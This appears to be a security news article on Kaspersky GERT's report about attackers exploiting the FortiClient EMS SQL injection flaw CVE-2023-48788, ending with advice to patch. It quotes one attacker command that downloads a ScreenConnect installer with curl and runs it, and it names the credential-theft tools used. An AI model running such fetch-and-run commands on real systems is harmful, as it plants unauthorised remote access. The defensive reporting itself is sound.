InfoSecBulletin Cybersecurity for mankind
Kaspersky’s Global Emergency Response Team (GERT) found that attackers are exploiting a patched SQL injection vulnerability (CVE-2023-48788) in Fortinet FortiClient EMS, affecting versions 7.0.1 to 7.0.10 and 7.2.0 to 7.2.2. Even with available patches, many systems remain unupdated, allowing unauthorized code execution and compromise of networks.
According to the report, The vulnerability comes from inadequate filtering of SQL input. An attacker can send crafted packets to execute unauthorized commands. It’s especially risky on Windows servers exposed to the internet, as these systems often handle vital functions like secure VPN access for employees.
Micropatches released for Windows zero-day leaking NTLM hashes
VMware Patches Authentication Bypass Flaw in Windows Tool
IngressNightmare
Over 40% of cloud environments are vulnerable to RCE
(CVE-2025-29927)
Urgently Patch Your Next.js for Authorization Bypass
Oracle refutes breach after hacker claims 6 million data theft
Russian zero-day seller to offer up to $4 million for Telegram exploits
Cybercriminals Exploit Checkpoint’s Driver in a BYOVD Attack
IBM and Veeam Release Patches in AIX System and Backup
WhatsApp patched zero-click flaw exploited in spyware attacks
CVE-2025-24472
CISA Warns of Fortinet FortiOS Auth Bypass Vuln Exploited in Wild
The attack usually starts by exploiting a vulnerability to install remote monitoring tools like AnyDesk and ScreenConnect. This gives attackers a way to access the network and carry out actions like stealing credentials, moving laterally, and avoiding detection.
In October 2024, GERT analysts discovered a vulnerability being exploited when telemetry alerts showed unauthorized access to registry hives through an admin account on a compromised Windows server. Investigations found that attackers used Base64-encoded payloads and tools like curl and certutil to download malicious installers.
One significant command found in the attackers’ scripts was:
curl -o C:\update.exe “https://infinity.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe” & start /B C:\update.exe & start /B C:\update.exe
The attackers showed adaptability by targeting various organizations, mainly in South America, and used platforms like webhook.site to collect data from vulnerable systems.
Key artifacts identified during the investigation included:
- Connections to external servers traced to IP addresses associated with previous malicious campaigns.
- Evidence of credential harvesting tools, such as mimikatz.exe and webbrowserpassview.exe.
- Suspicious entries in ems.log and sql_trace.log, pointing to SQL injection attempts.
GERT’s findings highlight the need to update FortiClient EMS to versions 7.0.11–7.0.13 or 7.2.3 and later.
